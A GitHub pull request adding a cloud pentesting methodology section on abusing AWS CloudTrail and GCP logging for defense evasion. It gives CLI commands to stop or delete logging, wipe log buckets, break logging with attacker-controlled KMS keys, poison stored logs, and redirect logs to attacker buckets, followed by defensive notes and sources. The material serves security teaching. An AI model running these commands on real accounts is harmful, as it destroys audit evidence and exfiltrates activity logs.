Skip to content

Blinding the Watchmen Abusing Cloud Logging Services for Def... #303

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
carlospolop wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Blinding the Watchmen Abusing Cloud Logging Services for Def... #303

Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
119 changes: 118 additions & 1 deletion src/pentesting-cloud/pentesting-cloud-methodology.md
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -420,6 +420,115 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo

- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)


## Cloud Logging Defense Evasion & Log Exfiltration

Cloud audit pipelines are also an **attack surface**. If an attacker gets permissions over the **log router** (CloudTrail trail / GCP sink), the **destination storage** (S3 / log bucket / Cloud Storage), or the **encryption key** (KMS / CMEK), they can blind detections, destroy evidence, poison forensic data, or get passive visibility into the victim account.

### Preconditions to check

High-risk permissions in this area include:

- **AWS:** `cloudtrail:StopLogging`, `cloudtrail:DeleteTrail`, `cloudtrail:UpdateTrail`, `cloudtrail:CreateTrail`, `s3:DeleteBucket`, `s3:DeleteObject`, `s3:GetObject`, `s3:PutObject`, and KMS permissions that let an attacker swap or break the key used by CloudTrail.
- **GCP:** `logging.sinks.update`, `logging.sinks.delete`, `logging.sinks.create`, `logging.buckets.delete`, `storage.objects.get`, `storage.objects.create`, and KMS/CMEK permissions affecting log buckets.

### Common attacker playbooks

#### 1. Stop log delivery

- **AWS:** stop the trail so no new events are delivered to the configured S3 bucket.
- **GCP:** disable the sink so matching entries are no longer routed.

```bash
# AWS
aws cloudtrail stop-logging --name <trail-name>

# GCP
gcloud logging sinks update <sink-name> --disabled
```

#### 2. Delete the router or the destination

Deleting the **router** stops future delivery. Deleting the **destination** can both stop delivery and destroy historical evidence.

```bash
# AWS: delete router
aws cloudtrail delete-trail --name <trail-name>

# AWS: delete historical log storage (bucket must be empty first)
aws s3 rm s3://<cloudtrail-bucket> --recursive
aws s3api delete-bucket --bucket <cloudtrail-bucket>

# GCP: delete router
gcloud logging sinks delete <sink-name>

# GCP: delete log bucket
gcloud logging buckets delete <bucket-name> --location=<location>
```

#### 3. Break logging with an attacker-controlled encryption key

A stealthier pattern is to **repoint logging to an attacker-controlled KMS/CMEK key** that initially works, and then revoke the logging service access to that key.

- **AWS:** `update-trail --kms-key-id <attacker-key>` and then remove the `cloudtrail.amazonaws.com` access from the key policy or delete the key material. CloudTrail may surface a misleading **bucket access denied** style error even though the bucket is fine.
- **GCP:** if the log bucket already supports CMEK, update it to use an attacker-controlled key and then revoke the Cloud Logging service account decrypt permissions. Reverting may fail because the current key can no longer decrypt the bucket.

```bash
# AWS
aws cloudtrail update-trail --name <trail-name> --kms-key-id <attacker-kms-key-arn>

# GCP
gcloud logging buckets update <bucket-name> \
--location=<location> \
--cmek-kms-key-name=<full-kms-key-name>
```

#### 4. Poison historical logs

If logs are exported as **JSON objects** into object storage, an attacker with object read/write permissions can download, modify, and overwrite historical records.

- **AWS:** modify CloudTrail objects in S3. Downstream consumers such as Athena may parse the poisoned events.
- **GCP:** when sinks export to Cloud Storage, modify the stored objects there.

> [!TIP]
> In AWS, enable **CloudTrail log file integrity validation** to detect post-delivery tampering. This is especially important for trails created through CLI/API workflows.

#### 5. Create a parallel log export for passive visibility

Instead of running noisy discovery commands, an attacker can configure a **new** router that continuously exports victim activity to attacker-controlled infrastructure.

```bash
# AWS
aws cloudtrail create-trail \
--name <attacker-trail> \
--s3-bucket-name <attacker-bucket>

# GCP
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```

This provides passive discovery of API calls, IAM changes, new compute instances, and access to sensitive services.

#### 6. Redirect the existing pipeline

Modifying the current destination is usually noisier from a defender perspective than creating a second pipeline, but it can also **blind** the original monitoring stack while exfiltrating the same logs.

```bash
# AWS
aws cloudtrail update-trail --name <trail-name> --s3-bucket-name <attacker-bucket>

# GCP
gcloud logging sinks update <sink-name> <new-destination>
```

### High-value defensive details

- **AWS CloudTrail Event History** keeps an immutable **90-day** history for **management events**, but **data** and **network** events are not covered there.
- **AWS EventBridge** rules on trail creation, modification, deletion, and `StopLogging` can catch log-plane tampering.
- **GCP `_Required`** log bucket cannot be disabled, modified, or deleted, so it is the safest place for critical audit logs.
- **GCP locked log buckets** prevent premature deletion because retention becomes irreversible until all retained entries age out.


## Google

### GCP
Expand Down Expand Up @@ -454,7 +563,15 @@ azure-security/
confidential-computing/luks2-header-malleability-null-cipher-abuse.md
{{#endref}}

{{#include ../banners/hacktricks-training.md}}
## References

- [Unit 42 - Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility](https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/)
- [AWS CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html)
- [AWS CloudTrail log file integrity validation](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html)
- [AWS CloudTrail Event History](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)
- [Google Cloud Logging sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
- [Google Cloud Logging bucket locking](https://docs.cloud.google.com/logging/docs/buckets#locking-logs-buckets)
- [Google Cloud Logging CMEK](https://docs.cloud.google.com/logging/docs/routing/managed-encryption)

{{#include ../banners/hacktricks-training.md}}